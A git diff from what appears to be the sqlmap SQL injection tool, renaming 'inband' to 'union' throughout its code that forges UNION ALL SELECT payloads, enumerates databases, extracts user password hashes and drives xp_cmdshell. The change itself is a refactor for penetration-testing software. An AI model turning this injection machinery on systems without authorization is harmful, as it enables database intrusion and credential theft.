diff --git a/lib/controller/checks.py b/lib/controller/checks.py index e51714482..e6aada74d 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -436,7 +436,7 @@ def checkSqlInjection(place, parameter, value): # Test for UNION injection and set the sample # payload as well as the vector. # NOTE: vector is set to a tuple with 6 elements, - # used afterwards by Agent.forgeInbandQuery() + # used afterwards by Agent.forgeUnionQuery() # method to forge the UNION query payload configUnion(test.request.char, test.request.columns) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index b1e8c80db..aa9cf6b76 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -133,7 +133,7 @@ def __formatInjection(inj): if stype == PAYLOAD.TECHNIQUE.UNION: count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1 title = re.sub(r"\d+ to \d+", str(count), title) - vector = agent.forgeInbandQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6]) + vector = agent.forgeUnionQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6]) if count == 1: title = title.replace("columns", "column") elif comment: diff --git a/lib/core/agent.py b/lib/core/agent.py index bedc8e33d..e17bd4b39 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -561,7 +561,7 @@ class Agent: return concatenatedQuery - def forgeInbandQuery(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None): + def forgeUnionQuery(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None): """ Take in input an query (pseudo query) string and return its processed UNION ALL SELECT query. @@ -602,20 +602,20 @@ class Agent: if Backend.getIdentifiedDbms() in (DBMS.MYSQL, ): limitOriginal = "%s " % (queries[Backend.getIdentifiedDbms()].limit.query % (0, 1)) - inbandQuery = self.prefixQuery("%sUNION ALL SELECT " % limitOriginal, prefix=prefix) + unionQuery = self.prefixQuery("%sUNION ALL SELECT " % limitOriginal, prefix=prefix) if limited: - inbandQuery += ','.join(char if _ != position else '(SELECT %s)' % query for _ in xrange(0, count)) - inbandQuery += fromTable - inbandQuery = self.suffixQuery(inbandQuery, comment, suffix) + unionQuery += ','.join(char if _ != position else '(SELECT %s)' % query for _ in xrange(0, count)) + unionQuery += fromTable + unionQuery = self.suffixQuery(unionQuery, comment, suffix) - return inbandQuery + return unionQuery topNumRegex = re.search("\ATOP\s+([\d]+)\s+", query, re.I) if topNumRegex: topNum = topNumRegex.group(1) query = query[len("TOP %s " % topNum):] - inbandQuery += "TOP %s " % topNum + unionQuery += "TOP %s " % topNum intoRegExp = re.search("(\s+INTO (DUMP|OUT)FILE\s+\'(.+?)\')", query, re.I) @@ -623,51 +623,51 @@ class Agent: intoRegExp = intoRegExp.group(1) query = query[:query.index(intoRegExp)] - if fromTable and inbandQuery.endswith(fromTable): - inbandQuery = inbandQuery[:-len(fromTable)] + if fromTable and unionQuery.endswith(fromTable): + unionQuery = unionQuery[:-len(fromTable)] for element in xrange(0, count): if element > 0: - inbandQuery += ',' + unionQuery += ',' if element == position: if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "): conditionIndex = query.index(" FROM ") - inbandQuery += query[:conditionIndex] + unionQuery += query[:conditionIndex] else: - inbandQuery += query + unionQuery += query else: - inbandQuery += char + unionQuery += char if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "): conditionIndex = query.index(" FROM ") - inbandQuery += query[conditionIndex:] + unionQuery += query[conditionIndex:] if fromTable: - if " FROM " not in inbandQuery or "(CASE " in inbandQuery or "(IIF" in inbandQuery: - inbandQuery += fromTable + if " FROM " not in unionQuery or "(CASE " in unionQuery or "(IIF" in unionQuery: + unionQuery += fromTable if intoRegExp: - inbandQuery += intoRegExp + unionQuery += intoRegExp if multipleUnions: - inbandQuery += " UNION ALL SELECT " + unionQuery += " UNION ALL SELECT " for element in xrange(count): if element > 0: - inbandQuery += ',' + unionQuery += ',' if element == position: - inbandQuery += multipleUnions + unionQuery += multipleUnions else: - inbandQuery += char + unionQuery += char if fromTable: - inbandQuery += fromTable + unionQuery += fromTable - inbandQuery = self.suffixQuery(inbandQuery, comment, suffix) + unionQuery = self.suffixQuery(unionQuery, comment, suffix) - return inbandQuery + return unionQuery def limitQuery(self, num, query, field=None, uniqueField=None): """ diff --git a/lib/core/common.py b/lib/core/common.py index 245324d8c..c74219b88 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1150,7 +1150,7 @@ def getLimitRange(count, dump=False, plusOne=False): def parseUnionPage(page): """ - Returns resulting items from inband query inside provided page content + Returns resulting items from union query inside provided page content """ if page is None: diff --git a/lib/core/settings.py b/lib/core/settings.py index 471bc7f99..7d77a128c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -435,7 +435,7 @@ MAX_DNS_LABEL = 63 # Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content) DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.letters) -# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION/inband injections) +# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections) MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024 # Maximum response total page size (trimmed if larger) diff --git a/lib/request/inject.py b/lib/request/inject.py index dd6390843..ea843b821 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -347,9 +347,9 @@ def __goBooleanProxy(expression): return output -def __goInband(expression, unpack=True, dump=False): +def __goUnion(expression, unpack=True, dump=False): """ - Retrieve the output of a SQL query taking advantage of an inband SQL + Retrieve the output of a SQL query taking advantage of an union SQL injection vulnerability on the affected parameter. """ @@ -360,12 +360,10 @@ def __goInband(expression, unpack=True, dump=False): return output -def getValue(expression, blind=True, inband=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True): +def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True): """ Called each time sqlmap inject a SQL query on the SQL injection - affected parameter. It can call a function to retrieve the output - through inband SQL injection (if selected) and/or blind SQL injection - (if selected). + affected parameter. """ kb.safeCharEncode = safeCharEncode @@ -400,9 +398,9 @@ def getValue(expression, blind=True, inband=True, error=True, time=True, fromUse query = query.replace("DISTINCT ", "") if not conf.forceDns: - if inband and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): + if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): kb.technique = PAYLOAD.TECHNIQUE.UNION - value = __goInband(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump) + value = __goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump) count += 1 found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py index 2b67abb8e..6b2f1c9a3 100644 --- a/lib/takeover/xp_cmdshell.py +++ b/lib/takeover/xp_cmdshell.py @@ -213,12 +213,12 @@ class xp_cmdshell: output = inject.getValue(query, resumeValue=False, blind=False, time=False) else: output = [] - count = inject.getValue("SELECT COUNT(*) FROM %s" % self.cmdTblName, resumeValue=False, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue("SELECT COUNT(*) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if isNumPosStrValue(count): for index in getLimitRange(count): query = agent.limitQuery(index, query, self.tblField) - output.append(inject.getValue(query, inband=False, error=False, resumeValue=False)) + output.append(inject.getValue(query, union=False, error=False, resumeValue=False)) inject.goStacked("DELETE FROM %s" % self.cmdTblName) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index f45dfb09c..e32c06217 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -101,7 +101,7 @@ def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where pages = {} for count in xrange(lowerCount, upperCount+1): - query = agent.forgeInbandQuery('', -1, count, comment, prefix, suffix, kb.uChar, where) + query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) if not isNullValue(kb.uChar): @@ -166,7 +166,7 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL # For each column of the table (# of NULL) perform a request using # the UNION ALL SELECT statement to test it the target url is - # affected by an exploitable inband SQL injection vulnerability + # affected by an exploitable union SQL injection vulnerability for position in positions: # Prepare expression with delimiters randQuery = randomStr(UNION_MIN_RESPONSE_CHARS) @@ -174,8 +174,8 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) randQueryUnescaped = unescaper.unescape(randQueryProcessed) - # Forge the inband SQL injection request - query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) + # Forge the union SQL injection request + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) # Perform the request @@ -196,8 +196,8 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2) - # Confirm that it is a full inband SQL injection - query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) + # Confirm that it is a full union SQL injection + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) # Perform the request @@ -210,7 +210,7 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) # Check for limited row output - query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) # Perform the request @@ -239,11 +239,11 @@ def __unionConfirm(comment, place, parameter, prefix, suffix, count): validPayload = None vector = None - # Confirm the inband SQL injection and get the exact column + # Confirm the union SQL injection and get the exact column # position which can be used to extract data validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count) - # Assure that the above function found the exploitable full inband + # Assure that the above function found the exploitable full union # SQL injection position if not validPayload: validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE) @@ -252,7 +252,7 @@ def __unionConfirm(comment, place, parameter, prefix, suffix, count): def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix): """ - This method tests if the target url is affected by an inband + This method tests if the target url is affected by an union SQL injection vulnerability. The test is done up to 50 columns on the target database table """ @@ -297,7 +297,7 @@ def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix def unionTest(comment, place, parameter, value, prefix, suffix): """ - This method tests if the target url is affected by an inband + This method tests if the target url is affected by an union SQL injection vulnerability. The test is done up to 3*50 times """ diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index 1eb68bdbb..72f71c362 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py @@ -48,7 +48,7 @@ from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request def __oneShotUnionUse(expression, unpack=True, limited=False): - retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as inband data is stored raw unconverted + retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as union data is stored raw unconverted threadData = getCurrentThreadData() threadData.resumed = retVal is not None @@ -59,10 +59,10 @@ def __oneShotUnionUse(expression, unpack=True, limited=False): where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else None - # Forge the inband SQL injection request + # Forge the union SQL injection request vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector kb.unionDuplicates = vector[7] - query = agent.forgeInbandQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) + query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) payload = agent.payload(newValue=query, where=where) # Perform the request @@ -90,7 +90,7 @@ def __oneShotUnionUse(expression, unpack=True, limited=False): if retVal is not None: retVal = getUnicode(retVal, kb.pageEncoding) - # Special case when DBMS is Microsoft SQL Server and error message is used as a result of inband injection + # Special case when DBMS is Microsoft SQL Server and error message is used as a result of union injection if Backend.isDbms(DBMS.MSSQL) and wasLastRequestDBMSError(): retVal = htmlunescape(retVal).replace("
", "\n") @@ -140,9 +140,9 @@ def configUnion(char=None, columns=None): def unionUse(expression, unpack=True, dump=False): """ - This function tests for an inband SQL injection on the target + This function tests for an union SQL injection on the target url then call its subsidiary function to effectively perform an - inband SQL injection on the affected url + union SQL injection on the affected url """ initTechnique(PAYLOAD.TECHNIQUE.UNION) @@ -341,7 +341,7 @@ def unionUse(expression, unpack=True, dump=False): kb.suppressResumeInfo = False if not value and not abortedFlag: - expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) # full inband doesn't play well with ORDER BY + expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) # full union doesn't play well with ORDER BY value = __oneShotUnionUse(expression, unpack) duration = calculateDeltaSeconds(start) diff --git a/lib/utils/pivotdumptable.py b/lib/utils/pivotdumptable.py index 6c47b189c..04f438e18 100644 --- a/lib/utils/pivotdumptable.py +++ b/lib/utils/pivotdumptable.py @@ -35,7 +35,7 @@ def pivotDumpTable(table, colList, count=None, blind=True): if count is None: query = dumpNode.count % table - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT) if isinstance(count, basestring) and count.isdigit(): count = int(count) @@ -65,7 +65,7 @@ def pivotDumpTable(table, colList, count=None, blind=True): logger.info(infoMsg) query = dumpNode.count2 % (column, table) - value = inject.getValue(query, blind=blind, inband=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if isNumPosStrValue(value): validColumnList = True @@ -110,7 +110,7 @@ def pivotDumpTable(table, colList, count=None, blind=True): else: query = dumpNode.query2 % (column, table, colList[0], pivotValue) - value = unArrayizeValue(inject.getValue(query, blind=blind, time=blind, inband=not blind, error=not blind)) + value = unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind)) if column == colList[0]: if isNoneValue(value): diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py index bedc60e14..385a3f29b 100644 --- a/plugins/dbms/mssqlserver/enumeration.py +++ b/plugins/dbms/mssqlserver/enumeration.py @@ -119,7 +119,7 @@ class Enumeration(GenericEnumeration): for query in (rootQuery.blind.count, rootQuery.blind.count2, rootQuery.blind.count3): _ = query.replace("%s", db) - count = inject.getValue(_, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(_, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNoneValue(count): break @@ -135,7 +135,7 @@ class Enumeration(GenericEnumeration): for index in xrange(int(count)): _ = (rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db) % index - table = inject.getValue(_, inband=False, error=False) + table = inject.getValue(_, union=False, error=False) if not isNoneValue(table): kb.hintValue = table table = safeSQLIdentificatorNaming(table, True) @@ -220,7 +220,7 @@ class Enumeration(GenericEnumeration): query = rootQuery.blind.count query = query.replace("%s", db) query += " AND %s" % tblQuery - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "no table" @@ -239,7 +239,7 @@ class Enumeration(GenericEnumeration): query = query.replace("%s", db) query += " AND %s" % tblQuery query = agent.limitQuery(index, query, tblCond) - tbl = inject.getValue(query, inband=False, error=False) + tbl = inject.getValue(query, union=False, error=False) kb.hintValue = tbl foundTbls[db].append(tbl) @@ -367,7 +367,7 @@ class Enumeration(GenericEnumeration): query = query % (db, db, db, db, db, db) query += " AND %s" % colQuery.replace("[DB]", db) query += whereTblsQuery.replace("[DB]", db) - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "no tables contain column" @@ -387,7 +387,7 @@ class Enumeration(GenericEnumeration): query += " AND %s" % colQuery.replace("[DB]", db) query += whereTblsQuery.replace("[DB]", db) query = agent.limitQuery(index, query, colCond.replace("[DB]", db)) - tbl = inject.getValue(query, inband=False, error=False) + tbl = inject.getValue(query, union=False, error=False) kb.hintValue = tbl tbl = safeSQLIdentificatorNaming(tbl, True) diff --git a/plugins/dbms/oracle/enumeration.py b/plugins/dbms/oracle/enumeration.py index c4771d2b3..ea0d061d8 100644 --- a/plugins/dbms/oracle/enumeration.py +++ b/plugins/dbms/oracle/enumeration.py @@ -119,7 +119,7 @@ class Enumeration(GenericEnumeration): query = rootQuery.blind.count2 % queryUser else: query = rootQuery.blind.count % queryUser - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): if count != 0 and not query2: @@ -145,7 +145,7 @@ class Enumeration(GenericEnumeration): query = rootQuery.blind.query2 % (queryUser, index) else: query = rootQuery.blind.query % (queryUser, index) - role = inject.getValue(query, inband=False, error=False) + role = inject.getValue(query, union=False, error=False) # In Oracle we get the list of roles as string roles.add(role) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index f1a2a08b2..5f2aef7b1 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -116,7 +116,7 @@ class Databases: query = rootQuery.blind.count2 else: query = rootQuery.blind.count - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): errMsg = "unable to retrieve the number of databases" @@ -132,7 +132,7 @@ class Databases: query = rootQuery.blind.query2 % index else: query = rootQuery.blind.query % index - db = inject.getValue(query, inband=False, error=False) + db = inject.getValue(query, union=False, error=False) if db: kb.data.cachedDbs.append(safeSQLIdentificatorNaming(db)) @@ -300,7 +300,7 @@ class Databases: else: query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(db) - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if count == 0: warnMsg = "database '%s' " % unsafeSQLIdentificatorNaming(db) @@ -329,7 +329,7 @@ class Databases: else: query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index) - table = inject.getValue(query, inband=False, error=False) + table = inject.getValue(query, union=False, error=False) if not isNoneValue(table): kb.hintValue = table table = safeSQLIdentificatorNaming(table, True) @@ -593,11 +593,11 @@ class Databases: elif Backend.isDbms(DBMS.SQLITE): query = rootQuery.blind.query % tbl - value = inject.getValue(query, inband=False, error=False) + value = inject.getValue(query, union=False, error=False) parseSqliteTableSchema(value) return kb.data.cachedColumns - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): errMsg = "unable to retrieve the number of columns " @@ -629,7 +629,7 @@ class Databases: field = None query = agent.limitQuery(index, query, field, field) - column = inject.getValue(query, inband=False, error=False) + column = inject.getValue(query, union=False, error=False) if not isNoneValue(column): if not onlyColNames: @@ -643,7 +643,7 @@ class Databases: elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query2 % (tbl, column) - colType = inject.getValue(query, inband=False, error=False) + colType = inject.getValue(query, union=False, error=False) if Backend.isDbms(DBMS.FIREBIRD): colType = FIREBIRD_TYPES.get(colType, colType) diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index e94c84744..6e6ee076d 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -210,7 +210,7 @@ class Entries: else: query = rootQuery.blind.count % (conf.db, tbl) - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) lengths = {} entries = {} @@ -255,7 +255,7 @@ class Entries: if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: for column in colList: - if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), inband=False, error=False) == '0': + if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), union=False, error=False) == '0': emptyColumns.append(column) debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable) debugMsg += "dumped as it appears to be empty" @@ -284,7 +284,7 @@ class Entries: elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query % (index, column, tbl) - value = NULL if column in emptyColumns else inject.getValue(query, inband=False, error=False, dump=True) + value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True) value = '' if value is None else value _ = DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)) diff --git a/plugins/generic/search.py b/plugins/generic/search.py index 40ed6ae51..c26894476 100644 --- a/plugins/generic/search.py +++ b/plugins/generic/search.py @@ -103,7 +103,7 @@ class Search: query += dbQuery query += exclDbsQuery - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "no database" @@ -127,7 +127,7 @@ class Search: query += ") AS foobar" query = agent.limitQuery(index, query, dbCond) - value = inject.getValue(query, inband=False, error=False) + value = inject.getValue(query, union=False, error=False) value = safeSQLIdentificatorNaming(value) foundDbs.append(value) @@ -213,7 +213,7 @@ class Search: query = rootQuery.blind.count query += tblQuery query += whereDbsQuery - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "no databases have table" @@ -234,7 +234,7 @@ class Search: query += ") AS foobar" query = agent.limitQuery(index, query) - foundDb = inject.getValue(query, inband=False, error=False) + foundDb = inject.getValue(query, union=False, error=False) foundDb = safeSQLIdentificatorNaming(foundDb) if foundDb not in foundTbls: @@ -258,7 +258,7 @@ class Search: query = rootQuery.blind.count2 query = query % unsafeSQLIdentificatorNaming(db) query += " AND %s" % tblQuery - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "no table" @@ -278,7 +278,7 @@ class Search: query += " AND %s" % tblQuery query = agent.limitQuery(index, query) - foundTbl = inject.getValue(query, inband=False, error=False) + foundTbl = inject.getValue(query, union=False, error=False) kb.hintValue = foundTbl foundTbl = safeSQLIdentificatorNaming(foundTbl, True) foundTbls[db].append(foundTbl) @@ -431,7 +431,7 @@ class Search: query += colQuery query += whereDbsQuery query += whereTblsQuery - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "no databases have tables containing column" @@ -452,7 +452,7 @@ class Search: if Backend.isDbms(DBMS.DB2): query += ") AS foobar" query = agent.limitQuery(index, query) - db = inject.getValue(query, inband=False, error=False) + db = inject.getValue(query, union=False, error=False) db = safeSQLIdentificatorNaming(db) if db not in dbs: @@ -487,7 +487,7 @@ class Search: query = query % db query += " AND %s" % colQuery query += whereTblsQuery - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "no tables contain column" @@ -507,7 +507,7 @@ class Search: query += " AND %s" % colQuery query += whereTblsQuery query = agent.limitQuery(index, query) - tbl = inject.getValue(query, inband=False, error=False) + tbl = inject.getValue(query, union=False, error=False) kb.hintValue = tbl tbl = safeSQLIdentificatorNaming(tbl, True) diff --git a/plugins/generic/users.py b/plugins/generic/users.py index ff5838733..708b8c5e5 100644 --- a/plugins/generic/users.py +++ b/plugins/generic/users.py @@ -111,7 +111,7 @@ class Users: else: query = rootQuery.blind.count - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): errMsg = "unable to retrieve the number of database users" @@ -127,7 +127,7 @@ class Users: query = rootQuery.blind.query2 % index else: query = rootQuery.blind.query % index - user = inject.getValue(query, inband=False, error=False) + user = inject.getValue(query, union=False, error=False) if user: kb.data.cachedUsers.append(user) @@ -252,7 +252,7 @@ class Users: else: query = rootQuery.blind.count % user - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "unable to retrieve the number of password " @@ -277,7 +277,7 @@ class Users: else: query = rootQuery.blind.query % (user, index) - password = inject.getValue(query, inband=False, error=False) + password = inject.getValue(query, union=False, error=False) password = parsePasswordHash(password) passwords.append(password) @@ -467,7 +467,7 @@ class Users: else: query = rootQuery.blind.count % user - count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): if Backend.isDbms(DBMS.ORACLE) and not query2: @@ -500,7 +500,7 @@ class Users: query = rootQuery.blind.query % (index, user) else: query = rootQuery.blind.query % (user, index) - privilege = inject.getValue(query, inband=False, error=False) + privilege = inject.getValue(query, union=False, error=False) # In PostgreSQL we get 1 if the privilege is True, # 0 otherwise